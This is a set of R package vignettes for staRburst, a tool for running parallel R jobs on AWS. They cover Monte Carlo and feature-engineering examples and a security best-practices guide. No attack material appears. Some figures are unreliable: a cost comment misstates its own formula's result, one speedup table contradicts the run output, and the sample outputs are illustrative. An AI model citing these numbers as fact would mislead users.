1. **Check CloudWatch Logs** - Most issues have error messages in logs
2. **Review AWS Console** - Check ECS, S3, ECR for resource status
3. **File GitHub Issue** - Include error messages and logs
4. **AWS Support** - For quota increases or AWS-specific issues

**Information to Include in Bug Reports:**

- staRburst version: `packageVersion("starburst")`
- R version: `R.version.string`
- AWS region
- Launch type (Fargate vs EC2)
- Error messages from R and CloudWatch logs
- Session ID (for detached sessions)
- Output of `session$status()` (if applicable)

## See Also

- [Security Best Practices](security.html) - Securing your staRburst deployments
- [staRburst README](https://github.com/scttfrdmn/starburst) - Getting started guide
- [AWS Fargate Documentation](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/AWS_Fargate.html)

---
title: "Example: Monte Carlo Portfolio Simulation"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Monte Carlo Portfolio Simulation}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Monte Carlo simulations are a common use case for parallel computing. This example demonstrates running 10,000 portfolio simulations to estimate risk metrics.

**Use Case**: Portfolio risk analysis, Value at Risk (VaR) calculations, stress testing

**Computational Pattern**: Embarrassingly parallel - each simulation is independent

## The Problem

You need to simulate 10,000 different portfolio scenarios to estimate:
- Expected portfolio value
- Value at Risk (VaR) at 95% confidence
- Sharpe ratio distribution
- Probability of loss scenarios

Each simulation involves 252 trading days (one year) with correlated asset returns.

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(ggplot2)
```

## Simulation Function

Define a function that simulates one portfolio trajectory:

```{r simulation, eval=FALSE}
simulate_portfolio <- function(seed) {
  set.seed(seed)

  # Portfolio parameters
  n_days <- 252
  initial_value <- 1000000  # $1M portfolio

  # Asset allocation (60/40 stocks/bonds)
  stock_weight <- 0.6
  bond_weight <- 0.4

  # Expected returns (annualized)
  stock_return <- 0.10 / 252  # 10% annual
  bond_return <- 0.04 / 252   # 4% annual

  # Volatility (annualized)
  stock_vol <- 0.20 / sqrt(252)  # 20% annual
  bond_vol <- 0.05 / sqrt(252)   # 5% annual

  # Correlation
  correlation <- 0.3

  # Generate correlated returns
  stock_returns <- rnorm(n_days, mean = stock_return, sd = stock_vol)
  bond_noise <- rnorm(n_days)
  bond_returns <- rnorm(n_days, mean = bond_return, sd = bond_vol)
  bond_returns <- correlation * stock_returns +
                  sqrt(1 - correlation^2) * bond_returns

  # Portfolio returns
  portfolio_returns <- stock_weight * stock_returns +
                      bond_weight * bond_returns

  # Cumulative value
  portfolio_values <- initial_value * cumprod(1 + portfolio_returns)

  # Calculate metrics
  final_value <- portfolio_values[n_days]
  max_drawdown <- max((cummax(portfolio_values) - portfolio_values) /
                      cummax(portfolio_values))
  sharpe_ratio <- mean(portfolio_returns) / sd(portfolio_returns) * sqrt(252)

  list(
    final_value = final_value,
    return_pct = (final_value - initial_value) / initial_value * 100,
    max_drawdown = max_drawdown,
    sharpe_ratio = sharpe_ratio,
    min_value = min(portfolio_values),
    max_value = max(portfolio_values)
  )
}
```

## Local Execution

Run a smaller test locally:

```{r local, eval=FALSE}
# Test with 100 simulations
set.seed(123)
local_start <- Sys.time()
local_results <- lapply(1:100, simulate_portfolio)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("100 simulations completed in %.1f seconds\n", local_time))
cat(sprintf("Estimated time for 10,000: %.1f minutes\n",
            local_time * 100 / 60))
```

**Typical output**:
```
100 simulations completed in 2.3 seconds
Estimated time for 10,000: 3.8 minutes
```

For 10,000 simulations locally: **~3.8 minutes**

## Cloud Execution with staRburst

Run all 10,000 simulations on AWS:

```{r cloud, eval=FALSE}
# Run 10,000 simulations on 50 workers
results <- starburst_map(
  1:10000,
  simulate_portfolio,
  workers = 50,
  cpu = 2,
  memory = "4GB"
)
```

**Typical output**:
```
🚀 Starting starburst cluster with 50 workers
💰 Estimated cost: ~$2.80/hour
📊 Processing 10000 items with 50 workers
📦 Created 50 chunks (avg 200 items per chunk)
🚀 Submitting tasks...
✓ Submitted 50 tasks
⏳ Progress: 50/50 tasks (1.2 minutes elapsed)

✓ Completed in 1.2 minutes
💰 Actual cost: $0.06
```

## Results Analysis

Extract and analyze the results:

```{r analysis, eval=FALSE}
# Extract metrics
final_values <- sapply(results, function(x) x$final_value)
returns <- sapply(results, function(x) x$return_pct)
sharpe_ratios <- sapply(results, function(x) x$sharpe_ratio)
max_drawdowns <- sapply(results, function(x) x$max_drawdown)

# Summary statistics
cat("\n=== Portfolio Simulation Results (10,000 scenarios) ===\n")
cat(sprintf("Mean final value: $%.0f\n", mean(final_values)))
cat(sprintf("Median final value: $%.0f\n", median(final_values)))
cat(sprintf("\nMean return: %.2f%%\n", mean(returns)))
cat(sprintf("Std dev of returns: %.2f%%\n", sd(returns)))
cat(sprintf("\nValue at Risk (5%%): $%.0f\n",
            quantile(final_values, 0.05)))
cat(sprintf("Expected Shortfall (5%%): $%.0f\n",
            mean(final_values[final_values <= quantile(final_values, 0.05)])))
cat(sprintf("\nMean Sharpe Ratio: %.2f\n", mean(sharpe_ratios)))
cat(sprintf("Mean Max Drawdown: %.2f%%\n", mean(max_drawdowns) * 100))
cat(sprintf("\nProbability of loss: %.2f%%\n",
            mean(returns < 0) * 100))

# Distribution plot
hist(final_values / 1000,
     breaks = 50,
     main = "Distribution of Portfolio Final Values",
     xlab = "Final Value ($1000s)",
     col = "lightblue",
     border = "white")
abline(v = 1000, col = "red", lwd = 2, lty = 2)
abline(v = quantile(final_values / 1000, 0.05), col = "orange", lwd = 2, lty = 2)
legend("topright",
       c("Initial Value", "VaR (5%)"),
       col = c("red", "orange"),
       lwd = 2, lty = 2)
```

**Typical output**:
```
=== Portfolio Simulation Results (10,000 scenarios) ===
Mean final value: $1,102,450
Median final value: $1,097,230

Mean return: 10.24%
Std dev of returns: 12.83%

Value at Risk (5%): $892,340
Expected Shortfall (5%): $845,120

Mean Sharpe Ratio: 0.82
Mean Max Drawdown: 8.45%

Probability of loss: 18.34%
```

## Performance Comparison

| Method | Workers | Time | Cost | Speedup |
|--------|---------|------|------|---------|
| Local | 1 | 3.8 min | $0 | 1x |
| staRburst | 10 | 0.6 min | $0.03 | 6.3x |
| staRburst | 25 | 0.3 min | $0.04 | 12.7x |
| staRburst | 50 | 0.2 min | $0.06 | 19x |

**Key Insights**:
- Near-linear scaling up to 50 workers
- Cost remains minimal ($0.06) even with 50 workers
- Sweet spot: 25-50 workers for this workload
- Total iteration time: <2 minutes from start to results

## When to Use This Pattern

**Good fit**:
- Each iteration is independent
- Computational time > 0.1 seconds per iteration
- Total iterations > 1,000
- Results can be easily aggregated

**Not ideal**:
- Very fast iterations (< 0.01 seconds)
- High data transfer per iteration
- Strong sequential dependencies

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/monte-carlo.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/monte-carlo.R", package = "starburst"))
```

## Next Steps

- Try adjusting portfolio parameters (allocation, volatility)
- Experiment with different worker counts
- Compare costs for different AWS regions
- Add more sophisticated portfolio models

**Related examples**:
- [Bootstrap Confidence Intervals](example-bootstrap.html) - Another Monte Carlo application
- [Financial Risk Modeling](example-risk-modeling.html) - Advanced portfolio analysis

---
title: "Example: Parallel Feature Engineering"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Feature Engineering}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Feature engineering often involves computationally expensive transformations across large datasets. This example demonstrates parallelizing feature calculation across data segments to dramatically speed up preprocessing pipelines.

**Use Case**: Machine learning preprocessing, ETL pipelines, data enrichment, time-series feature extraction

**Computational Pattern**: Data parallelism with chunked processing and aggregation

## The Problem

You have a dataset of 100,000 customer transactions and need to compute multiple engineered features:
- Rolling statistics (moving averages, standard deviations)
- Lag features (previous N values)
- Time-based features (day of week, month, seasonality)
- Aggregated customer metrics (lifetime value, purchase frequency)
- Text-based features (sentiment scores, keyword extraction)
- Categorical encodings (target encoding, frequency encoding)

Computing these features sequentially is slow. Parallelizing by customer ID allows independent processing.

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(dplyr)
```

## Generate Sample Data

Create synthetic transaction data:

```{r data, eval=FALSE}
set.seed(123)

# Generate 100,000 transactions for 5,000 customers
n_customers <- 5000
n_transactions <- 100000

transactions <- data.frame(
  customer_id = sample(1:n_customers, n_transactions, replace = TRUE),
  transaction_date = as.Date("2023-01-01") + sample(0:364, n_transactions, replace = TRUE),
  amount = exp(rnorm(n_transactions, log(50), 0.8)),  # Log-normal distribution
  category = sample(c("groceries", "electronics", "clothing", "restaurants", "other"),
                   n_transactions, replace = TRUE, prob = c(0.4, 0.1, 0.2, 0.2, 0.1)),
  payment_method = sample(c("credit", "debit", "cash"), n_transactions, replace = TRUE),
  is_online = sample(c(TRUE, FALSE), n_transactions, replace = TRUE, prob = c(0.3, 0.7))
)

# Sort by customer and date
transactions <- transactions[order(transactions$customer_id, transactions$transaction_date), ]

cat(sprintf("Dataset: %s transactions for %s customers\n",
            format(nrow(transactions), big.mark = ","),
            format(length(unique(transactions$customer_id)), big.mark = ",")))
cat(sprintf("Date range: %s to %s\n",
            min(transactions$transaction_date),
            max(transactions$transaction_date)))
```

**Output**:
```
Dataset: 100,000 transactions for 5,000 customers
Date range: 2023-01-01 to 2023-12-31
```

## Feature Engineering Function

Define a function that computes features for a set of customers:

```{r features-fn, eval=FALSE}
engineer_features <- function(customer_ids, transactions_data) {
  # Filter to specified customers
  customer_data <- transactions_data[transactions_data$customer_id %in% customer_ids, ]

  if (nrow(customer_data) == 0) {
    return(NULL)
  }

  # Sort by customer and date
  customer_data <- customer_data[order(customer_data$customer_id,
                                      customer_data$transaction_date), ]

  # Compute features for each customer
  features_list <- lapply(customer_ids, function(cid) {
    cust_txn <- customer_data[customer_data$customer_id == cid, ]

    if (nrow(cust_txn) == 0) {
      return(NULL)
    }

    # Basic statistics
    total_transactions <- nrow(cust_txn)
    total_spend <- sum(cust_txn$amount)
    avg_transaction <- mean(cust_txn$amount)

    # Time-based features
    first_purchase <- min(cust_txn$transaction_date)
    last_purchase <- max(cust_txn$transaction_date)
    days_active <- as.numeric(difftime(last_purchase, first_purchase, units = "days"))
    purchase_frequency <- if (days_active > 0) total_transactions / days_active else 0

    # Rolling statistics (last 30 days)
    recent_cutoff <- last_purchase - 30
    recent_txn <- cust_txn[cust_txn$transaction_date > recent_cutoff, ]
    recent_spend <- if (nrow(recent_txn) > 0) sum(recent_txn$amount) else 0
    recent_count <- nrow(recent_txn)

    # Category preferences
    category_counts <- table(cust_txn$category)
    favorite_category <- names(category_counts)[which.max(category_counts)]
    category_diversity <- length(unique(cust_txn$category))

    # Payment behavior
    online_pct <- mean(cust_txn$is_online) * 100
    credit_pct <- mean(cust_txn$payment_method == "credit") * 100

    # Volatility metrics
    amount_sd <- sd(cust_txn$amount)
    amount_cv <- amount_sd / avg_transaction  # Coefficient of variation

    # Time patterns
    weekday <- as.POSIXlt(cust_txn$transaction_date)$wday
    weekend_pct <- mean(weekday %in% c(0, 6)) * 100

    # RFM features (Recency, Frequency, Monetary)
    recency <- as.numeric(difftime(as.Date("2024-01-01"), last_purchase, units = "days"))

    data.frame(
      customer_id = cid,
      total_transactions = total_transactions,
      total_spend = total_spend,
      avg_transaction = avg_transaction,
      days_active = days_active,
      purchase_frequency = purchase_frequency,
      recent_spend_30d = recent_spend,
      recent_count_30d = recent_count,
      favorite_category = favorite_category,
      category_diversity = category_diversity,
      online_pct = online_pct,
      credit_pct = credit_pct,
      amount_sd = amount_sd,
      amount_cv = amount_cv,
      weekend_pct = weekend_pct,
      recency_days = recency,
      stringsAsFactors = FALSE
    )
  })

  # Combine results
  do.call(rbind, features_list[!sapply(features_list, is.null)])
}
```

## Local Execution

Test feature engineering locally on a subset:

```{r local, eval=FALSE}
# Process 500 customers locally
set.seed(456)
sample_customers <- sample(unique(transactions$customer_id), 500)

cat(sprintf("Processing features for %d customers locally...\n", length(sample_customers)))
local_start <- Sys.time()

local_features <- engineer_features(sample_customers, transactions)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
cat(sprintf("  Generated %d features per customer\n", ncol(local_features) - 1))
cat(sprintf("  Estimated time for all %s customers: %.1f minutes\n",
            format(n_customers, big.mark = ","),
            local_time * (n_customers / 500) / 60))
```

**Typical output**:
```
Processing features for 500 customers locally...
✓ Completed in 3.8 seconds
  Generated 15 features per customer
  Estimated time for all 5,000 customers: 38.0 seconds
```

For all 5,000 customers locally: **~38 seconds**

## Cloud Execution with staRburst

Process all customers in parallel on AWS:

```{r cloud, eval=FALSE}
# Split customers into chunks
all_customers <- unique(transactions$customer_id)
n_workers <- 20

cat(sprintf("Processing features for %s customers on %d workers...\n",
            format(length(all_customers), big.mark = ","),
            n_workers))

# Create chunks of customer IDs
chunk_size <- ceiling(length(all_customers) / n_workers)
customer_chunks <- split(all_customers,
                        ceiling(seq_along(all_customers) / chunk_size))

cloud_start <- Sys.time()

# Process chunks in parallel
results <- starburst_map(
  customer_chunks,
  engineer_features,
  transactions_data = transactions,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Completed in %.1f seconds\n", cloud_time))

# Combine results
features <- do.call(rbind, results)
```

**Typical output**:
```
🚀 Starting starburst cluster with 20 workers
💰 Estimated cost: ~$1.60/hour
📊 Processing 20 items with 20 workers
📦 Created 20 chunks (avg 250 customers per chunk)
🚀 Submitting tasks...
✓ Submitted 20 tasks
⏳ Progress: 20/20 tasks (6.2 seconds elapsed)

✓ Completed in 6.2 seconds
💰 Actual cost: $0.003
```

## Results Analysis

Examine the engineered features:

```{r analysis, eval=FALSE}
cat("\n=== Feature Engineering Results ===\n\n")
cat(sprintf("Total customers processed: %s\n",
            format(nrow(features), big.mark = ",")))
cat(sprintf("Features generated per customer: %d\n", ncol(features) - 1))
cat(sprintf("\nFeature names:\n"))
print(names(features)[names(features) != "customer_id"])

# Summary statistics
cat("\n=== Feature Summary Statistics ===\n\n")
cat(sprintf("Average transactions per customer: %.1f\n",
            mean(features$total_transactions)))
cat(sprintf("Average total spend: $%.2f\n",
            mean(features$total_spend)))
cat(sprintf("Average transaction value: $%.2f\n",
            mean(features$avg_transaction)))
cat(sprintf("\nMost common category: %s\n",
            names(sort(table(features$favorite_category), decreasing = TRUE)[1])))
cat(sprintf("Average category diversity: %.1f categories\n",
            mean(features$category_diversity)))
cat(sprintf("\nAverage online purchase rate: %.1f%%\n",
            mean(features$online_pct)))
cat(sprintf("Average credit card usage: %.1f%%\n",
            mean(features$credit_pct)))
cat(sprintf("\nMean purchase frequency: %.3f transactions/day\n",
            mean(features$purchase_frequency, na.rm = TRUE)))
cat(sprintf("Mean recency: %.0f days since last purchase\n",
            mean(features$recency_days)))

# Identify high-value segments
high_value <- features[features$total_spend > quantile(features$total_spend, 0.9), ]
cat(sprintf("\n=== Top 10%% Customers (by spend) ===\n"))
cat(sprintf("Count: %d customers\n", nrow(high_value)))
cat(sprintf("Average total spend: $%.2f\n", mean(high_value$total_spend)))
cat(sprintf("Average transactions: %.1f\n", mean(high_value$total_transactions)))
cat(sprintf("Average online rate: %.1f%%\n", mean(high_value$online_pct)))
```

**Typical output**:
```
=== Feature Engineering Results ===

Total customers processed: 5,000
Features generated per customer: 15

Feature names:
[1] "total_transactions"  "total_spend"         "avg_transaction"
[4] "days_active"        "purchase_frequency"  "recent_spend_30d"
[7] "recent_count_30d"   "favorite_category"   "category_diversity"
[10] "online_pct"         "credit_pct"          "amount_sd"
[13] "amount_cv"          "weekend_pct"         "recency_days"

=== Feature Summary Statistics ===

Average transactions per customer: 20.0
Average total spend: $1,002.45
Average transaction value: $50.12

Most common category: groceries
Average category diversity: 3.8 categories

Average online purchase rate: 30.2%
Average credit card usage: 33.1%

Mean purchase frequency: 0.055 transactions/day
Mean recency: 183 days since last purchase

=== Top 10% Customers (by spend) ===
Count: 500 customers
Average total spend: $2,845.23
Average transactions: 51.2
Average online rate: 28.9%
```

## Performance Comparison

| Method | Customers | Time | Cost | Speedup |
|--------|-----------|------|------|---------|
| Local | 500 | 3.8 sec | $0 | - |
| Local (est.) | 5,000 | 38 sec | $0 | 1x |
| staRburst | 5,000 | 6.2 sec | $0.003 | 6.1x |

**Key Insights**:
- Excellent parallelization efficiency (6x speedup)
- Minimal cost for significant time savings
- Scales well to larger datasets (100K+ customers)
- Can process 100 customers/second with 20 workers

## Advanced: Adding ML-Ready Features

Extend the feature function for machine learning:

```{r ml-features, eval=FALSE}
engineer_ml_features <- function(customer_ids, transactions_data) {
  base_features <- engineer_features(customer_ids, transactions_data)

  if (is.null(base_features)) {
    return(NULL)
  }

  # Add derived features for ML
  base_features$clv_estimate <- base_features$avg_transaction *
                                 base_features$purchase_frequency * 365
  base_features$engagement_score <- scale(base_features$total_transactions) +
                                    scale(base_features$category_diversity)
  base_features$recency_score <- -scale(base_features$recency_days)
  base_features$is_high_value <- base_features$total_spend >
                                  median(base_features$total_spend)
  base_features$purchase_momentum <- base_features$recent_count_30d /
                                     (base_features$total_transactions + 1)

  base_features
}

# Process with enhanced features
ml_results <- starburst_map(
  customer_chunks,
  engineer_ml_features,
  transactions_data = transactions,
  workers = 20,
  cpu = 2,
  memory = "4GB"
)

ml_features <- do.call(rbind, ml_results)
```

## When to Use This Pattern

**Good fit**:
- Large datasets requiring expensive transformations
- Independent processing by group (customer, product, region)
- Multiple feature types needing calculation
- Iterative feature engineering pipelines
- Real-time feature stores with batch updates

**Not ideal**:
- Simple vectorized operations (use dplyr/data.table)
- Features requiring global statistics
- Very small datasets (< 1,000 groups)
- Real-time single-record scoring

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/feature-engineering.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/feature-engineering.R", package = "starburst"))
```

## Next Steps

- Scale to millions of records
- Add more sophisticated features (embeddings, graph features)
- Integrate with ML training pipelines
- Experiment with different chunk sizes
- Add feature validation and quality checks

**Related examples**:
- [Grid Search](example-grid-search.html) - Hyperparameter tuning with features
- [Risk Modeling](example-risk-modeling.html) - Advanced customer analytics
- [Bootstrap CI](example-bootstrap.html) - Feature importance estimation

---
title: "Security Best Practices for staRburst"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Security Best Practices for staRburst}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

# Security Best Practices for staRburst

This guide covers security considerations for deploying and using staRburst in production environments.

## 1. Credential Management

### ❌ DON'T: Hard-code Credentials

**Never** hard-code AWS credentials in your code:

```r
# NEVER DO THIS - credentials exposed in code
Sys.setenv(
  AWS_ACCESS_KEY_ID = "AKIA...",
  AWS_SECRET_ACCESS_KEY = "wJalr..."
)
```

**Why it's dangerous:**
- Credentials in code can be committed to version control
- Logs may capture environment variables
- Code sharing exposes credentials

### ✅ DO: Use IAM Roles (Recommended)

When running on AWS infrastructure (EC2, ECS, Lambda):

```r
# No credentials needed - automatically uses instance/task IAM role
library(starburst)
plan(starburst, workers = 10)
```

**Benefits:**
- No credential management required
- Automatic credential rotation
- Fine-grained permissions via IAM policies
- Audit trail via CloudTrail

**Setup:**
1. Create IAM role with required permissions
2. Attach role to EC2 instance or ECS task
3. staRburst automatically discovers and uses role credentials

### ✅ DO: Use Named Profiles (Local Development)

For local development, use AWS CLI profiles:

```r
# Credentials stored in ~/.aws/credentials
Sys.setenv(AWS_PROFILE = "my-starburst-profile")

library(starburst)
plan(starburst, workers = 10)
```

**Setup:**
```bash
# Configure AWS CLI profile
aws configure --profile my-starburst-profile
```

### ✅ DO: Use Temporary Credentials (STS)

For cross-account access or enhanced security:

```r
library(paws.security.identity)
sts <- paws.security.identity::sts()

# Assume role with MFA
credentials <- sts$assume_role(
  RoleArn = "arn:aws:iam::123456789012:role/StarburstRole",
  RoleSessionName = "starburst-session",
  SerialNumber = "arn:aws:iam::123456789012:mfa/user",
  TokenCode = "123456"  # MFA token
)

# Use temporary credentials
Sys.setenv(
  AWS_ACCESS_KEY_ID = credentials$Credentials$AccessKeyId,
  AWS_SECRET_ACCESS_KEY = credentials$Credentials$SecretAccessKey,
  AWS_SESSION_TOKEN = credentials$Credentials$SessionToken
)
```

**Benefits:**
- Time-limited credentials (expire after 1-12 hours)
- Can require MFA for sensitive operations
- Separate credentials for different roles

## 2. S3 Bucket Security

### Minimum Required Permissions

Create an IAM policy for staRburst workers:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "StarburstWorkerAccess",
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:PutObject",
        "s3:DeleteObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::my-starburst-bucket",
        "arn:aws:s3:::my-starburst-bucket/*"
      ],
      "Condition": {
        "StringLike": {
          "s3:prefix": ["sessions/*", "tasks/*", "results/*"]
        }
      }
    }
  ]
}
```

### Enable Server-Side Encryption

Encrypt data at rest in S3:

```r
# Option 1: Enable default encryption via AWS Console or CLI
library(paws.storage)
s3 <- paws.storage::s3()

s3$put_bucket_encryption(
  Bucket = "my-starburst-bucket",
  ServerSideEncryptionConfiguration = list(
    Rules = list(
      list(
        ApplyServerSideEncryptionByDefault = list(
          SSEAlgorithm = "AES256"  # Or "aws:kms" for KMS
        ),
        BucketKeyEnabled = TRUE
      )
    )
  )
)
```

**Encryption Options:**
- **AES256** - S3-managed keys (SSE-S3, free)
- **aws:kms** - AWS KMS managed keys (SSE-KMS, more control, costs apply)
- **aws:kms:dsse** - Dual-layer encryption for compliance (SSE-KMS-DSSE)

### Enable Versioning

Protect against accidental deletion:

```r
s3$put_bucket_versioning(
  Bucket = "my-starburst-bucket",
  VersioningConfiguration = list(
    Status = "Enabled"
  )
)
```

**Benefits:**
- Recover from accidental deletions
- Rollback to previous versions
- Required for certain compliance frameworks

### Block Public Access

Ensure bucket is never publicly accessible:

```r
s3$put_public_access_block(
  Bucket = "my-starburst-bucket",
  PublicAccessBlockConfiguration = list(
    BlockPublicAcls = TRUE,
    IgnorePublicAcls = TRUE,
    BlockPublicPolicy = TRUE,
    RestrictPublicBuckets = TRUE
  )
)
```

### Use Bucket Policies

Restrict access to specific IAM roles:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyUnencryptedObjectUploads",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::my-starburst-bucket/*",
      "Condition": {
        "StringNotEquals": {
          "s3:x-amz-server-side-encryption": "AES256"
        }
      }
    },
    {
      "Sid": "DenyInsecureTransport",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": "arn:aws:s3:::my-starburst-bucket/*",
      "Condition": {
        "Bool": {
          "aws:SecureTransport": "false"
        }
      }
    }
  ]
}
```

## 3. Network Isolation

### Use Private Subnets (For Sensitive Workloads)

Deploy workers in private subnets without internet access:

```r
library(starburst)

# Configure to use private subnets
starburst_config(
  subnets = c("subnet-private-1a", "subnet-private-1b"),
  security_groups = c("sg-starburst-workers")
)

plan(starburst, workers = 10)
```

**Requirements for Private Subnets:**
- VPC endpoints for S3, ECR, CloudWatch Logs
- NAT Gateway if internet access needed for some operations

### Configure Security Groups

Minimal security group (no inbound, only outbound):

```json
{
  "GroupName": "starburst-workers",
  "Description": "Security group for staRburst ECS tasks",
  "VpcId": "vpc-...",
  "SecurityGroupIngress": [],
  "SecurityGroupEgress": [
    {
      "IpProtocol": "tcp",
      "FromPort": 443,
      "ToPort": 443,
      "CidrIp": "0.0.0.0/0",
      "Description": "HTTPS to AWS services"
    }
  ]
}
```

### Enable VPC Endpoints (Recommended)

Avoid internet traffic for AWS service calls:

**S3 Gateway Endpoint** (free):
```bash
aws ec2 create-vpc-endpoint \
  --vpc-id vpc-... \
  --service-name com.amazonaws.us-east-1.s3 \
  --route-table-ids rtb-...
```

**ECR Interface Endpoints** (charges apply):
```bash
# ECR API endpoint
aws ec2 create-vpc-endpoint \
  --vpc-id vpc-... \
  --service-name com.amazonaws.us-east-1.ecr.api \
  --vpc-endpoint-type Interface \
  --subnet-ids subnet-... \
  --security-group-ids sg-...

# ECR Docker endpoint
aws ec2 create-vpc-endpoint \
  --vpc-id vpc-... \
  --service-name com.amazonaws.us-east-1.ecr.dkr \
  --vpc-endpoint-type Interface \
  --subnet-ids subnet-... \
  --security-group-ids sg-...
```

**CloudWatch Logs Endpoint**:
```bash
aws ec2 create-vpc-endpoint \
  --vpc-id vpc-... \
  --service-name com.amazonaws.us-east-1.logs \
  --vpc-endpoint-type Interface \
  --subnet-ids subnet-... \
  --security-group-ids sg-...
```

**Benefits:**
- All AWS API traffic stays within AWS network
- Reduced data transfer costs
- Better security posture (no internet exposure)

## 4. Cost Controls

### Set Budget Alerts

Create AWS Budget to monitor staRburst costs:

1. Go to **AWS Billing Console → Budgets**
2. Click **Create budget**
3. Choose **Cost budget**
4. Set monthly budget (e.g., $500)
5. Configure alerts:
   - 50% actual spend → Email warning
   - 80% actual spend → Email alert
   - 100% actual spend → Email urgent alert + SNS notification

### Use Worker Limits

staRburst enforces maximum 500 workers per plan:

```r
# This will error - prevents accidental huge deployments
plan(starburst, workers = 10000)
# Error: Workers must be <= 500

# Maximum allowed
plan(starburst, workers = 500)
```

### Monitor Active Sessions

Regularly check for orphaned sessions:

```r
# List all sessions
sessions <- starburst_list_sessions()
print(sessions)

# Cleanup old sessions
for (session_id in sessions$session_id) {
  # Check if session is old
  created_date <- as.Date(sessions$created_at[sessions$session_id == session_id])
  if (Sys.Date() - created_date > 7) {
    cat(sprintf("Cleaning up old session: %s\n", session_id))
    session <- starburst_session_attach(session_id)
    session$cleanup(stop_workers = TRUE, force = TRUE)
  }
}
```

### Use Absolute Timeouts

Prevent sessions from running indefinitely:

```r
# Session auto-terminates after 24 hours
session <- starburst_session(
  workers = 10,
  absolute_timeout = 86400  # 24 hours in seconds
)
```

### Cost Estimation

Before launching large jobs:

```r
# Estimate cost
workers <- 100
cpu <- 4
memory_gb <- 8
runtime_hours <- 2

# Fargate pricing (us-east-1, 2026)
vcpu_price <- 0.04048
memory_price <- 0.004445

cost_per_worker <- (cpu * vcpu_price) + (memory_gb * memory_price)
total_cost <- workers * cost_per_worker * runtime_hours

cat(sprintf("Estimated cost: $%.2f for %d hours\n", total_cost, runtime_hours))
# Estimated cost: $19.84 for 2 hours
```

## 5. Audit Logging

### Enable CloudTrail

Capture all API calls for security auditing:

1. **AWS Console → CloudTrail**
2. **Create trail**
3. **Apply to all regions**
4. **Enable for management events**
5. **Enable for data events** (optional, for S3 object-level logging)

**What CloudTrail Captures:**
- Who launched staRburst workers (IAM user/role)
- When tasks were created/stopped
- S3 object access (if data events enabled)
- API failures and authorization errors

### Enable CloudWatch Logs

staRburst automatically logs to CloudWatch:

- **Log Group:** `/aws/ecs/starburst-worker`
- **Retention:** 7 days (default)

Increase retention for compliance:

```r
library(paws.management)
logs <- paws.management::cloudwatchlogs()

logs$put_retention_policy(
  logGroupName = "/aws/ecs/starburst-worker",
  retentionInDays = 30  # or 90, 180, 365, etc.
)
```

### Enable S3 Access Logging

Track all S3 bucket access:

```r
s3$put_bucket_logging(
  Bucket = "my-starburst-bucket",
  BucketLoggingStatus = list(
    LoggingEnabled = list(
      TargetBucket = "my-logging-bucket",
      TargetPrefix = "starburst-access-logs/"
    )
  )
)
```

**Access logs include:**
- Who accessed objects
- When objects were accessed
- What operations were performed
- Source IP addresses

### Review Security Events

Regularly review logs for suspicious activity:

```r
# CloudWatch Insights query for failed authentications
library(paws.management)
logs <- paws.management::cloudwatchlogs()

# Query for errors in last 24 hours
query <- "fields @timestamp, @message
| filter @message like /ERROR|AccessDenied|Forbidden/
| sort @timestamp desc"

start_time <- as.integer(Sys.time() - 86400)  # 24 hours ago
end_time <- as.integer(Sys.time())

result <- logs$start_query(
  logGroupName = "/aws/ecs/starburst-worker",
  startTime = start_time,
  endTime = end_time,
  queryString = query
)
```

## 6. Data Protection

### Minimize Data Uploaded to S3

Only send necessary data to workers:

```r
# ✅ Good - only send needed data
large_data <- read.csv("huge_dataset.csv")
sample_data <- large_data[1:1000, ]  # Use sample for testing

plan(starburst, workers = 10)
results <- future_map(1:10, function(i) {
  # sample_data automatically uploaded as global
  analyze(sample_data[i, ])
})

# ❌ Bad - sends entire large dataset
plan(starburst, workers = 10)
results <- future_map(1:10, function(i) {
  analyze(large_data[i, ])  # Uploads all of large_data
})
```

### Delete Results After Collection

```r
# Collect and immediately delete from S3
session <- starburst_session(workers = 10)
task_id <- session$submit(quote(sensitive_computation()))

# Wait for completion
results <- session$collect(wait = TRUE)

# Immediately cleanup (force = TRUE deletes S3 files)
session$cleanup(force = TRUE)

# Save results locally if needed
saveRDS(results, "local_results.rds")
```

### Consider Client-Side Encryption

For highly sensitive data:

```r
# Encrypt before upload
library(sodium)

# Generate key (store securely, e.g., AWS Secrets Manager)
key <- random(32)

# Encrypt data before passing to future
sensitive_data <- serialize(my_data, NULL)
encrypted_data <- data_encrypt(sensitive_data, key)

# Run computation
plan(starburst, workers = 1)
result <- future({
  # Decrypt in worker
  decrypted <- data_decrypt(encrypted_data, key)
  my_data <- unserialize(decrypted)
  # Process...
})
```

